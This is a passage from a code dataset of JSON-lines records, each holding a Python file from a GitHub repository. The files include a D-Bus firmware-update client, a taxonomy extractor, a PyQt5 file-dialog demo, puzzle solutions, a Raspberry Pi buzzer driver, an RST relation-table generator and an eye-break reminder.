D-Bus, and send update commands to probe daemo\r\n It will write the process information to /tmp/update_info\r\n\"\"\"\r\nimport sys\r\nimport os\r\nimport time\r\nimport dbus\r\nfrom traceback import print_exc\r\nfrom argparse import ArgumentParser\r\nimport json\r\n\r\n\r\n\r\ndef is_json(myjson):\r\n try:\r\n json_object = json.loads(myjson)\r\n except ValueError:\r\n return False\r\n return True\r\n\r\n\r\nclass ProbeDBus(object):\r\n\r\n def __init__(self, dbus_tcp):\r\n super(ProbeDBus, self).__init__()\r\n 
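        # The interface proxies below are filled in by attach_probe(), which
        # connects either to a remote bus (tcp:host=<ip>,port=55556) or to
        # the local system bus, then resolves the "h2o.probe.service" name
        # at object path /ProbeObject.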
self.probe_general = None\r\n self.probe_measure = None\r\n self.bus = self.attach_probe(dbus_tcp)\r\n\r\n def is_alive(self):\r\n return False if self.bus is None else True\r\n\r\n def attach_probe(self, dbus_tcp=None):\r\n try:\r\n if dbus_tcp is not None:\r\n bus = dbus.bus.BusConnection(\"tcp:host=\"+dbus_tcp+\",port=55556\")\r\n else:\r\n bus = dbus.SystemBus() \r\n bus_obj = bus.get_object(\"h2o.probe.service\", \"/ProbeObject\")\r\n self.probe_general = dbus.Interface(bus_obj, \"h2o.probe.service.general\")\r\n self.probe_measure = dbus.Interface(bus_obj, \"h2o.probe.service.measure\")\r\n return bus\r\n except dbus.DBusException:\r\n print_exc()\r\n return None\r\n\r\n def dbus_json(self, json_cmd):\r\n result = self.probe_measure.Json(json_cmd)\r\n result = json.loads(result)\r\n # result = json.dumps(result, sort_keys=True, indent=4, separators=(',', ': '))\r\n return result\r\n\r\nclass ProbeCommand(object):\r\n \r\n def __init__(self, protocol):\r\n pass\r\n\r\n def execute(self, cmd):\r\n pass\r\n\r\n\r\nclass UpdateClient(ProbeCommand):\r\n\r\n info_path = '/tmp/update_info'\r\n error_path = '/tmp/update_error'\r\n\r\n ''' Resolve command from single command, command json list, or event command BASIC script. '''\r\n def __init__(self, dbus_tcp):\r\n try :\r\n self.probe = ProbeDBus(dbus_tcp)\r\n except:\r\n print_exc()\r\n self.write_err(\"Can not connect to dbus service\")\r\n\r\n\r\n def write_err(self, err):\r\n err_msg = json.dumps(err, sort_keys=True, indent=4, separators=(',', ': '))\r\n print(err_msg)\r\n with open(self.error_path, 'w') as err_file:\r\n err_file.write(err_msg)\r\n\r\n def write_info(self, info):\r\n with open(self.info_path, 'w') as info_file:\r\n info_file.write(info)\r\n\r\n def write_stdout(self, info):\r\n sys.stdout.write(\"\\rUpdate mcu in processing: \" + info + \"%\")\r\n sys.stdout.flush()\r\n\r\n def send_udpate(self, file):\r\n json_cmd = '{\"op\": \"flash\", \"param\": {\"hex\": \"' + file + '\"}}'\r\n result = self.probe.dbus_json(json_cmd)\r\n if result['ack'] != 0:\r\n self.write_err(result)\r\n return False\r\n return True\r\n\r\n def query_update(self):\r\n json_cmd = '{ \"op\": \"flash_progress\", \"param\": {} }'\r\n for i in range(1, 180):\r\n time.sleep(1)\r\n result = self.probe.dbus_json(json_cmd)\r\n if result['ack'] != 0:\r\n self.write_err(result)\r\n return False\r\n process = float(result['result']) * 100\r\n self.write_stdout(str(int(process)))\r\n self.write_info(str(int(process)))\r\n\r\n if(process == 100):\r\n print('\\rUpdate finished! 
')\r\n break\r\n return True\r\n\r\n def init_update(self):\r\n if os.access(self.error_path, os.F_OK):\r\n os.remove(self.error_path)\r\n self.write_info('0')\r\n\r\n def update(self, file):\r\n self.init_update()\r\n if False == self.send_udpate(file):\r\n return False\r\n if False == self.query_update():\r\n return False\r\n return True\r\n\r\n def execute(self, file):\r\n try :\r\n return self.update(file)\r\n except:\r\n print_exc()\r\n self.write_err(\"Exception happened in update muc\")\r\n return False\r\n\r\n\r\ndef parse_args():\r\n parser = ArgumentParser(description='Communicate with Probe to update firmware.')\r\n parser.add_argument('--tcp', dest='dbus_tcp',\r\n help='Attach to remote D-Bus Probe daemon (e.g.: 10.131.133.25)',\r\n default=None, type=str)\r\n parser.add_argument('--firmware', dest='firmware_file',\r\n help='Pointer to the mcu firmware binary file path',\r\n default='/tmp/mcu/firmware.bin', type=str)\r\n args = parser.parse_args()\r\n return args\r\n \r\n\r\ndef main():\r\n args = parse_args()\r\n client = UpdateClient(args.dbus_tcp)\r\n return client.execute(args.firmware_file)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"HachCompany-C4C/meta-rainbow","sub_path":"recipes-common/swupdate-pkg/files/update_mcu.py","file_name":"update_mcu.py","file_ext":"py","file_size_in_byte":4852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13183255232","text":"\"\"\"Contains the main textractor class.\"\"\"\n\nfrom taxonomy_extractor.core import CodeTable\nfrom taxonomy_extractor.vectorspace import word2vec\nfrom taxonomy_extractor.util import io\nfrom taxonomy_extractor.util import logger\n\nlogger = logger.init_logger()\n\n\nclass Textractor(object):\n\n \"\"\"\n Textractor class.\n\n - Reads in input code tables\n - traing vector space model\n - use model + string similarity to fill in new tables\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize a textractor instance.\n \"\"\"\n self.input_tables = []\n self.output_table = None\n self.total_phrases = []\n self.vector_space_model = None\n\n def run(self, parsed_config):\n \"\"\"\n Run the textractor module.\n\n params:\n parsed_config (dict)\n \"\"\"\n logger.debug('Starting Textractor with args %s' % parsed_config)\n\n self.read_input_tables(parsed_config['default']['filled_taxonomies'])\n self.train_vector_space(\n parsed_config['word2vec'],\n parsed_config['default']['vector_space_output'])\n self.read_output_table(parsed_config['default']['empty_taxonomies'])\n self.fill_output_tables(parsed_config['default']['vector_threshold'])\n self.write_output_tables(parsed_config['default']['output_taxonomies'])\n\n def read_input_tables(self, input_tables_paths):\n \"\"\"\n Read in input tables.\n\n params:\n input_tables_paths (list[str])\n \"\"\"\n logger.info('Reading in input tables %s' % input_tables_paths)\n for path in input_tables_paths:\n self.input_tables.append(self._read_table(path))\n\n def read_output_table(self, output_table_path):\n \"\"\"\n Read in output table.\n\n params:\n output_table_path (str)\n \"\"\"\n logger.info('Reading in output table to be filled %s' %\n output_table_path)\n self.output_table = self._read_table(output_table_path)\n\n def write_output_tables(self, output_table_path):\n \"\"\"\n Write filled tables to the output path.\n\n params:\n output_table_path (str)\n \"\"\"\n logger.info('Writing output table to %s' % output_table_path)\n self._write_table(\n self.output_table.taxonomies_to_str(), 
output_table_path)\n\n def _read_table(self, path):\n \"\"\"\n Read in a single table.\n\n - Parse taxonomies\n - Create a CodeTable instance\n - Assign taxonomies to the new CodeTable\n\n params:\n path (str)\n \"\"\"\n parsed_taxonomies = io.read(path)\n table = CodeTable()\n table.read(parsed_taxonomies)\n return table\n\n def _write_table(self, table, path):\n \"\"\"\n Write CodeTable to the given path.\n\n params:\n table (CodeTable)\n path (str)\n \"\"\"\n io.write(table, path)\n\n def train_vector_space(self, train_params, output_path):\n \"\"\"\n Train vector space model.\n\n params:\n train_params (dict)\n \"\"\"\n if io.exists(output_path):\n logger.debug('Vector space already exists, loading %s' %\n output_path)\n self.vector_space_model = io.read(output_path)\n else:\n logger.info('Training vector space using word2vec')\n self._collect_phrases()\n phrases_as_tokens = self._phrases_to_tokens()\n self._start_word2vec(phrases_as_tokens, train_params)\n self._assign_vectors_to_phrases()\n logger.debug('Writing vector space to %s' %\n output_path)\n\n io.write(self.vector_space_model, output_path)\n\n def _start_word2vec(self, phrases_as_tokens, train_params):\n \"\"\"\n Start word2vec training.\n\n Phrases as tokens represent each taxonomy as series of tokens.\n Example:\n + Software Engineer\n - Software Developer\n - Backend Developer\n\n will be represented as: [software, engineer, software, developer, ..]\n\n params:\n phrases_as_tokens (list[list[str]])\n train_params (dict)\n \"\"\"\n logger.debug('Starting word2vec')\n self.vector_space_model = word2vec.Word2Vec()\n self.vector_space_model.train(phrases_as_tokens, train_params)\n\n def _assign_vectors_to_phrases(self):\n \"\"\"\n Assign vectors to phrases after training.\n\n Since training is done on the token level, each phrase will get\n a vector based on its tokens' vectors, by taking their average\n \"\"\"\n logger.debug(\n 'Converting vector space model from token level to phrase level')\n\n self.vector_space_model.create_phrase_model(self.total_phrases)\n\n def fill_output_tables(self, vector_threshold):\n \"\"\"\n Fill output tables with new phrases.\n \"\"\"\n logger.info('Filling output tables')\n\n phrases_dict = self._phrases_to_dict()\n\n logger.debug('Assigning early attractors using string similarity')\n self.output_table.assign_early_attractors(phrases_dict)\n\n logger.debug('Assigning remaining phrases using vector similarity')\n for phrase_obj in phrases_dict.values():\n self.output_table.assign_attractor(phrase_obj,\n self.vector_space_model,\n vector_threshold)\n\n def _collect_phrases(self):\n \"\"\"\n Collect phrases from input tables.\n\n self.total_phrases should then be a huge list of Phrase objects\n \"\"\"\n logger.debug('Collecting phrase from input tables')\n for table in self.input_tables:\n self.total_phrases += table.collect_phrases()\n\n def _phrases_to_tokens(self):\n \"\"\"\n Create a list of tokens representing the phrase list.\n\n returns:\n list[list[str]]\n \"\"\"\n logger.debug('Collecting phrase tokens for training')\n phrases_as_tokens = []\n for phrase in self.total_phrases:\n phrases_as_tokens.append(phrase.tokens)\n\n return phrases_as_tokens\n\n def _phrases_to_dict(self):\n \"\"\"\n Create a dict of phrases str and their object references.\n\n returns:\n dict{str:Phrase}\n \"\"\"\n logger.debug(\n 'Creating dict to fill output table')\n\n phrases_dict = {}\n for phrase in self.total_phrases:\n phrases_dict[phrase.raw_form] = phrase\n\n return 
phrases_dict\n","repo_name":"tarekmehrez/Taxonomy-Enricher","sub_path":"lib/taxonomy_extractor/main/textractor.py","file_name":"textractor.py","file_ext":"py","file_size_in_byte":6625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15904066405","text":"from PyQt5.Qt import *\r\n\r\nclass Window(QWidget):\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.setWindowTitle(\"QFileDialog----静态方法的学习\")\r\n        self.resize(500, 500)\r\n        self.setup_ui()\r\n\r\n    def setup_ui(self):\r\n        # Get the name of a file to open; \"./\" means the current folder\r\n        # Filter out unwanted file formats with a filter string, e.g. \".png\"; ** means all files; separate multiple filters with ;;\r\n        #result = QFileDialog.getOpenFileName(self, \"选择一个py文件\", \",/\",\r\n        #                                     \"All(*.*);;Images(*.png *.jpg);;Python文件(*.py)\")\r\n        # A tuple of the absolute path and the filter string\r\n        #print(result)\r\n\r\n        # # Get multiple files at once\r\n        # result = QFileDialog.getOpenFileNames(self, \"选择多个文件\",\",/\",\r\n        #                                       \"All(*.*);;Images(*.png *.jpg);;Python文件(*.py)\" )\r\n        # # Returns a tuple; its first element is a list holding all the selected file paths, followed by the filter\r\n        # print(result)\r\n\r\n        # result = QFileDialog.getOpenFileUrl(self, \"选择一个文件\", \"./\",\r\n        #                                     \"All(*.*);;Images(*.png *.jpg);;python(*.py)\")\r\n        # # The first element of the tuple becomes a QUrl object; local files use the protocol file://\r\n        # print(result)\r\n\r\n        # Save a file\r\n        # result = QFileDialog.getSaveFileName(self, \"保存文件\", \"./\", \"All(*.*);;Images(*.png *.jpg);;python文件(*.py)\")\r\n        # # With the save path obtained, the content to be saved can be written directly to that file\r\n        # print(result)\r\n\r\n        # # Get a folder\r\n        # result = QFileDialog.getExistingDirectory(self, \"选择一个文件夹\", \"./\")\r\n        # # The output is just a single path string\r\n        # print(result)\r\n\r\n        # Here the directory is passed as a QUrl object\r\n        result = QFileDialog.getExistingDirectory(self, \"选择一个文件夹\", QUrl(\"./\"))\r\n        print(result)\r\n\r\nif __name__ == \"__main__\":\r\n    import sys\r\n    app = QApplication(sys.argv)\r\n    window = Window()\r\n    window.resize(500, 500)\r\n    window.show()\r\n\r\n    sys.exit(app.exec_())\r\n","repo_name":"sevenandseven/pyqt5_learning","sub_path":"input_widget/QFileDialog----静态方法.py","file_name":"QFileDialog----静态方法.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44673834222","text":"import math\nimport sys\n\n\nif __name__ == \"__main__\":\n    inputdata = open(sys.argv[1], \"r\").readlines()\n    target = int(inputdata[0])\n    buses = [int(bus) for bus in inputdata[1].strip().split(\",\") if bus != \"x\"]\n    diff = [(int(target/bus)+1)*bus - target for bus in buses]\n    min_diff = min(diff)\n    print(\"Part 1:\", buses[diff.index(min_diff)]*min_diff)\n\n    buses = [(i,int(bus)) for i,bus in enumerate(inputdata[1].strip().split(\",\")) if bus != \"x\"]\n\n    increase = 1\n    t = 0\n\n    # initially, I had the loop the other way around and was checking each\n    # increment (by 1) of the timestamp.\n    # however, that is very slow, the other way around is basically instantaneous\n    for dt, bus in buses:\n        while True:\n            if (dt+t)%bus == 0:\n                break\n            # start with increase 1 until the first bus loop is found,\n            # then multiply the loop time to increase for each matching bus \n            t += increase\n        # for each bus, add the loop time to increase\n        increase *= bus\n\n    print(\"Part 2:\", t)\n    \n\n","repo_name":"tobigrimm/adventofcode2020","sub_path":"day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6728148154","text":"from math import gcd\n\nA, B = map(int, input().split())\nB //= A\n\nfor i in range(round(B**0.5), 0, -1):\n    if i**2 > B or B % i:\n        
continue\n\n if gcd(i, B // i) == 1:\n print(A * i, A * B // i)\n break\n","repo_name":"woohyunjng/Coding-Practice","sub_path":"Python/Baekjoon/.2000/2436.py","file_name":"2436.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27862074133","text":"from .managers import *\nfrom ...common.controllers import CrudController\nfrom ...personal.persona.managers import *\n\nimport json\n\n\nclass CorreoController(CrudController):\n\n manager = CorreoManager\n html_index = \"notificaciones/correo/views/index.html\"\n html_table = \"notificaciones/correo/views/table.html\"\n routes = {\n '/correo': {'GET': 'index', 'POST': 'table'},\n '/correo_insert': {'PUT': 'correos', 'POST': 'insert'},\n '/correo_update': {'PUT': 'edit', 'POST': 'update'},\n '/correo_delete': {'POST': 'delete_correo'},\n '/correo_dias': {'POST': 'actualizar_dias'},\n '/correo_hora': {'PUT': 'edit', 'POST': 'update_hora'},\n }\n\n def get_extra_data(self):\n aux = super().get_extra_data()\n aux['personal'] = PersonaManager(self.db).listar_todo()\n aux['hora_notificacion'] = CorreoManager(self.db).obtener_servidor()\n\n return aux\n\n def insert(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n diccionary['user'] = self.get_user_id()\n diccionary['ip'] = self.request.remote_ip\n CorreoManager(self.db).update(diccionary)\n self.respond(success=True, message='Insertado correctamente.')\n\n def update(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n diccionary['user'] = self.get_user_id()\n diccionary['ip'] = self.request.remote_ip\n CorreoManager(self.db).update(diccionary)\n self.respond(success=True, message='Modificado correctamente.')\n\n def edit(self):\n self.set_session()\n self.verif_privileges()\n ins_manager = self.manager(self.db)\n diccionary = json.loads(self.get_argument(\"object\"))\n indicted_object = ins_manager.obtener_servidor()\n if len(ins_manager.errors) == 0:\n self.respond(indicted_object.get_dict(), message='Operacion exitosa!')\n else:\n self.respond([item.__dict__ for item in ins_manager.errors], False, 'Ocurrió un error al insertar')\n self.db.close()\n\n def correos(self):\n self.set_session()\n self.verif_privileges()\n ins_manager = self.manager(self.db)\n indicted_object = ins_manager.obtener_servidor()\n if len(ins_manager.errors) == 0:\n self.respond(indicted_object.get_dict(), message='Operacion exitosa!')\n else:\n self.respond([item.__dict__ for item in ins_manager.errors], False, 'Ocurrió un error al insertar')\n self.db.close()\n\n def actualizar_dias(self):\n self.set_session()\n id = json.loads(self.get_argument(\"id\"))\n state = json.loads(self.get_argument(\"enabled\"))\n updated_object = self.manager(self.db).actualizacion_dias(id, state)\n if state:\n message = \"Dia dado de Alta!\"\n else:\n message = \"Dia dado de Baja!\"\n self.respond(updated_object.get_dict(), message=message)\n self.db.close()\n\n def delete_correo(self):\n self.set_session()\n self.verif_privileges()\n id = json.loads(self.get_argument(\"id\"))\n state = json.loads(self.get_argument(\"enabled\"))\n updated_object = self.manager(self.db).delete(id, state)\n if state:\n message = \"Correo dado de Alta!\"\n else:\n message = \"Correo dado de Baja!\"\n self.respond(updated_object.get_dict(), message=message)\n self.db.close()\n\n def update_hora(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n 
diccionary['user'] = self.get_user_id()\n        diccionary['ip'] = self.request.remote_ip\n        objeto = self.manager(self.db).obtener_servidor()\n        objeto.hora = datetime.strptime('01/01/2000 '+diccionary['hora'], '%d/%m/%Y %H:%M')\n        CorreoManager(self.db).update_hora(objeto,diccionary['user'],diccionary['ip'])\n        self.respond(success=True, message='Modificado correctamente.')\n","repo_name":"berthy7/cloudgh","sub_path":"server/notificaciones/correo/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15952927649","text":"import os\nimport subprocess\nfrom os import walk\n\nf = []\nexclude = [\"res\", \"custom_fpd_lib\", \"tests\"]\nfor (dirpath, dirnames, filenames) in walk(\"./\", topdown=True):\n    dirnames[:] = [d for d in dirnames if d not in exclude]\n    f.extend([os.path.join(*dirpath.split(\"/\"), s) for s in filenames])\ntmp = [el for el in f if el[-3:] == \".py\"]\nprint(f\"Found {len(tmp)} files: Compiling.....\")\nfor el in tmp:\n    print(f\"========== Formatting {el}\")\n    subprocess.run(\"autoflake --in-place --remove-all-unused-imports \" + el, shell=True, check=True)\n    subprocess.run(\"isort \" + el, shell=True, check=True)\n    subprocess.run(\"autopep8 --in-place --aggressive --aggressive \" + el, shell=True, check=True)\n","repo_name":"CS26-FPD-Explorer/FPD-Explorer","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"31340542634","text":"# Before the file is closed, writes are buffered in memory and not actually written to disk\n# Closing the file flushes the buffer automatically\n\n# Run this from cmd to see the effect\n\nf = open('test.txt', 'w', encoding='utf8')\nf.write('Hello')\n# Manually flush the buffer to write the content to disk\nf.flush()\nf.close()\n\n# demo\nimport sys, time\nfor i in range(30):\n    # No line break\n    # sys.stdout.write('*') # buffered first; all 30 are written to disk and shown only after buffering\n    # Flush the buffer every time\n    # sys.stdout.flush()\n    # print('*')\n    # print without a newline\n    # print(\"-\", end='')\n    # print without a newline, flushing\n    print('*', end='', flush=True)\n    # Total is 0.1 * 30 seconds\n    time.sleep(0.1)\n","repo_name":"ToWorkit/Python_base","sub_path":"文件操作/刷新缓存区.py","file_name":"刷新缓存区.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19976188339","text":"import pigpio\nimport logging\nimport time\n\nfrom src.main.commons.utils.utils import base_init\n\nlogger = logging.getLogger(\"drishti_buzzer\")\n\n\nclass Buzzer:\n    def __init__(self, pi):\n        self.pi = pi\n        self.buzzerPin = 4\n        self.pi.set_mode(self.buzzerPin, pigpio.OUTPUT)\n        self.pi.write(self.buzzerPin, pigpio.LOW)\n        logger.info(\"Buzzer Init\")\n\n    def double_beep(self, time_gap=0.2):\n        logger.debug(\"Buzzing Double\")\n        self.single_beep(time_gap)\n        self.single_beep(time_gap)\n\n    def single_beep(self, time_gap=0.2):\n        logger.debug(\"Beeping\")\n        self.switch_on()\n        time.sleep(time_gap)\n        self.switch_off()\n        time.sleep(time_gap)\n\n    def error_beep(self):\n        logger.debug(\"Beeping error\")\n        self.single_beep(0.1)\n        self.single_beep(0.1)\n        self.single_beep(0.1)\n\n    def switch_on(self):\n        logger.debug(\"Buzzing On\")\n        self.pi.write(self.buzzerPin, pigpio.HIGH)\n\n    def switch_off(self):\n        logger.debug(\"Buzzing OFF\")\n        self.pi.write(self.buzzerPin, pigpio.LOW)\n\n    def cleanup(self):\n        self.switch_off()\n\n\ndef loop():\n    while True:\n        buzzer.switch_on()\n        time.sleep(1)\n        buzzer.switch_off()\n        time.sleep(1)\n\n\nif __name__ == \"__main__\":\n    base_init()\n    pi = pigpio.pi()\n    
buzzer = Buzzer(pi)\n buzzer.switch_off()\n try:\n loop()\n except KeyboardInterrupt:\n buzzer.cleanup()\n","repo_name":"DrvAgwl/drishti","sub_path":"src/main/commons/hal/buzzer.py","file_name":"buzzer.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38623550936","text":"from .rsttree import RstTree, RstNode, Span, MonoNucRelation\nfrom .relationstable import RelTable, Relation, RelElement\n\nfrom collections import deque\n\n\nclass TableGenerator():\n def __init__(self):\n return\n\n def run(self, rstTree: RstTree) -> RelTable:\n # process mono-nuclear relations\n monoRelTable = RelTable()\n for monoNuc in rstTree.monoNucs:\n cs = extractCentralSubconstituent(nodes=[monoNuc.start],\n isNuclear=False)\n relation = Relation()\n relation.isMultiNuclear = False\n relation.name = monoNuc.relation\n relation.constituent = extractRelElement(node=monoNuc.start,\n isNuclear=False)\n relation.attachmentPoint = extractRelElement(node=monoNuc.end,\n isNuclear=True)\n relation.centralSubconstituent = cs\n monoRelTable.append(relation)\n\n # process multi-nuclear relations\n multiRelTable = RelTable()\n for multiNuc in rstTree.multiNucs:\n remainingNodes = deque(multiNuc.children)\n while len(remainingNodes) > 1:\n cs = extractCentralSubconstituent(nodes=remainingNodes,\n isNuclear=True)\n currentNode = remainingNodes.popleft()\n pseudoNode = createPseudoNode(remainingNodes)\n\n relation = Relation()\n relation.name = multiNuc.relation\n relation.isMultiNuclear = True\n relation.centralSubconstituent = cs\n relation.constituent = extractRelElement(node=currentNode,\n isNuclear=True)\n relation.attachmentPoint = extractRelElement(node=pseudoNode,\n isNuclear=True)\n multiRelTable.append(relation)\n\n # sort relations table\n monoRelTable.sort(key=sortRels)\n multiRelTable.sort(key=sortRels)\n\n return monoRelTable + multiRelTable\n\n\ndef sortRels(rel: Relation):\n return(0.99999*rel.centralSubconstituent[0].minID +\n 0.00001*rel.centralSubconstituent[-1].maxID)\n\n\ndef extractRelElement(node: RstNode, isNuclear: bool) -> RelElement:\n relElement = RelElement()\n relElement.minID = min(node.segmentID)\n relElement.maxID = max(node.segmentID)\n relElement.isLeaf = (node.text is not None)\n relElement.isNuclear = isNuclear\n return relElement\n\n\ndef createPseudoNode(nodes: list) -> RstNode:\n \"\"\" Creates a pseudo node as a representant of a list of nodes\n for generation of attachment point in multi-nuclear relations \"\"\"\n if len(nodes) > 1:\n ids = []\n for node in nodes:\n for id in node.segmentID:\n ids.append(id)\n\n pseudoNode = RstNode()\n pseudoNode.segmentID = [min(ids), max(ids)]\n return pseudoNode\n else:\n return nodes[0]\n\n\ndef extractCentralSubconstituent(nodes: list, isNuclear: bool):\n cs = []\n for node in nodes:\n monoNucRel = extractMonoNuclearRelation(node)\n if monoNucRel is not None:\n relElem = extractRelElement(node=monoNucRel.end,\n isNuclear=True)\n else:\n relElem = extractRelElement(node, isNuclear)\n cs.append(relElem)\n return cs\n\n\ndef extractMonoNuclearRelation(node: RstNode) -> MonoNucRelation:\n hasSpanBelow = isinstance(node.toChildren, Span)\n if hasSpanBelow:\n return node.toChildren.children[0].toSibling\n else:\n return 
None\n","repo_name":"tkutschbach/RST-Tace","sub_path":"rsttace/core/reltablegenerator.py","file_name":"reltablegenerator.py","file_ext":"py","file_size_in_byte":3737,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"69880034680","text":"#From: https://byui-cse.github.io/cse111-course/lesson02/check.html\n#By: Felipe dos Santos Belisário\n\n\"\"\"\nAssignment\nA manufacturing company needs a program that will help its employees pack manufactured items into boxes for shipping. Write a Python program named boxes.py that asks the user for two integers:\n\n1- the number of manufactured items\n2- the number of items that the user will pack per box\n\nYour program must compute and print the number of boxes necessary to hold the items. This must be a whole number. Note that the last box may be packed with fewer items than the other boxes.\n\n\"\"\"\nimport math\n#Function\ndef boxes_total(items, items_per_box):\n boxes = items / items_per_box\n return math.ceil(boxes) #module function\n\n\n\n\n\n#Built-in functions\nnumber_items = int(input('Enter the number of items: ')) \nitems_per_box = int(input('Enter the number of items per box: '))\n\nprint(f'\\nFor {number_items} items, packing {items_per_box} items in each box, you will need {boxes_total(number_items, items_per_box)} boxes.')\n","repo_name":"felipesud/byu-idaho","sub_path":"cse111/week01_Getting_Started/02checkpoint_boxes.py","file_name":"02checkpoint_boxes.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8269910966","text":"from tkinter import Tk\r\nimport tkinter as tk\r\nfrom keyboard import press_and_release\r\nfrom time import sleep\r\n\r\nbackground_color = \"#33334d\" # one variable to make all changes when you wont to change the background color\r\n\r\nclass GUI():\r\n def __init__(self):\r\n # Define our quote window\r\n self.root = Tk()\r\n self.root.attributes('-fullscreen', True) # to show a full screen window\r\n self.root.attributes('-alpha', 0.8) # to make our window transparent\r\n self.root.configure(bg=background_color) # background color\r\n self.quote_label = tk.Label(self.root, text=\"text\", fg=\"orange\", bg=background_color, justify=\"center\", wraplength=600)\r\n self.quote_label.config(font=('times', 24, 'bold'))\r\n self.quote_label.pack(padx=None, pady=250) # position label at the middle\r\n self.show()\r\n\r\n\r\n def show(self):\r\n press_and_release(\"cmd + d\")\r\n self.quotes_text()\r\n self.root.deiconify()\r\n # self.root.attributes('-topmost', 0)\r\n self.root.attributes('-topmost', 1)\r\n self.root.after(3000, self.hide) # duration: quote display > \"5000 (5 sec)\"\r\n\r\n def hide(self):\r\n self.root.iconify() # hide the window\r\n sleep(30) # duration: Stretching and looking for a 6 feet object away form you > 30sec \r\n self.notify()\r\n press_and_release(\"cmd + d\")\r\n self.root.after(1200000, self.show) # duration: working > \"1200000 (20 minutes)\"\r\n\r\n\r\n def quotes_text(self):\r\n from random import choice\r\n quote_file = \"E:\\\\Extension\\\\quotes_file.txt\" # the quote file directory\r\n with open(quote_file, \"r\", encoding=\"utf8\") as f:\r\n global random_quote\r\n random_quote = choice(f.readlines())\r\n self.quote_label['text'] = random_quote # to change the text in label to another random quote every time we call the function\r\n\r\n def notify(self):\r\n import winsound\r\n winsound.PlaySound(\"SystemHand\", 
winsound.SND_ALIAS)\r\n\r\nif __name__ == '__main__':\r\n gui = GUI()\r\n gui.root.mainloop()","repo_name":"MunoHeart/20-20-20","sub_path":"20-20-20(3)/20-20-20(3).py","file_name":"20-20-20(3).py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"930786740","text":"from copy import deepcopy\nfrom typing import List\n\nfrom IntermediateLanguage.Dictionaries.Dictionary import DictionaryDelta\nfrom IntermediateLanguage.Environment.Element import IPElem\nfrom IntermediateLanguage.Environment.environment import IP, IGC, IGamma\nfrom IntermediateLanguage.Terms.Term import ITermQAbs, ITermTypeAbs\nfrom SourceLanguageFD.Constraint.TC import FDTCA, FDTCTau\nfrom SourceLanguageFD.Constraint.constraint import FDQ, FDQSubst\nfrom SourceLanguageFD.Environment.AbstractElement import FDGammaElem, FDGCElemAbstract, FDPElemAbstract\nfrom SourceLanguageFD.Environment.AbstractEnvironment import FDAbstractP, FDAbstractGC, FDAbstractGamma\nfrom SourceLanguageFD.Environment.Element import FDGammaX, FDGammaA, FDGammaQ\nfrom SourceLanguageFD.Types.AbstractTypes import FDSigma, FDTau\nfrom SourceLanguageFD.Types.Tau import FDTypeSubst, FDTypeA\nfrom exceptions import NotFoundError\n\n\nclass FDGC(FDAbstractGC):\n elements = []\n\n def __init__(self, gcList: List[FDGCElemAbstract]):\n super().__init__()\n self.elements = gcList\n\n def addElement(self, element: FDGCElemAbstract):\n self.elements.append(element)\n\n def addElements(self, elements: List[FDGCElemAbstract]):\n self.elements = self.elements + elements\n\n def getSigmaFromName(self, name: str) -> FDSigma:\n for elem in self.elements:\n if elem.tc.name == name:\n return elem.sigma\n raise NotFoundError(\"Typeclass with name \" + name + \"was not found in the context.\")\n\n def getSigmaFromMethod(self, m: str) -> FDSigma:\n for elem in self.elements:\n if elem.m == m:\n return elem.sigma\n raise NotFoundError(\"Method with name \" + m + \"was not found in the context.\")\n\n def getAFromName(self, name: str):\n for elem in self.elements:\n if elem.tc.name == name:\n return elem.tc.tList\n raise NotFoundError(\"Typeclass with name \" + name + \"was not found in the context.\")\n\n def getGC1FromName(self, name: str):\n result = []\n for elem in self.elements:\n if elem.tc.name == name:\n return FDGC(result)\n else:\n result.append(elem)\n raise NotFoundError(\"Typeclass with name \" + name + \"was not found in the context.\")\n\n def getTCFromMethod(self, m: str) -> FDTCA:\n for elem in self.elements:\n if elem.m == m:\n return elem.tc\n raise NotFoundError(\"Method with name \" + m + \"was not found in the context.\")\n\n def getTCListFromMethod(self, m: str) -> List[FDTCA]:\n for elem in self.elements:\n if elem.m == m:\n return elem.tcList\n raise NotFoundError(\"Method with name \" + m + \"was not found in the context.\")\n\n def getTCListFromName(self, name: str) -> List[FDTCA]:\n for elem in self.elements:\n if elem.tc.name == name:\n return elem.tcList\n raise NotFoundError(\"Typeclass with name \" + name + \"was not found in the context.\")\n\n def closure(self, qList: List[FDQ]):\n if len(qList) == 0:\n return []\n else:\n qiNew = deepcopy(qList)\n q = qiNew.pop()\n qm = self.getTCListFromName(q.tc.name)\n qiNew += qm\n tList = q.tc.tList\n aList = 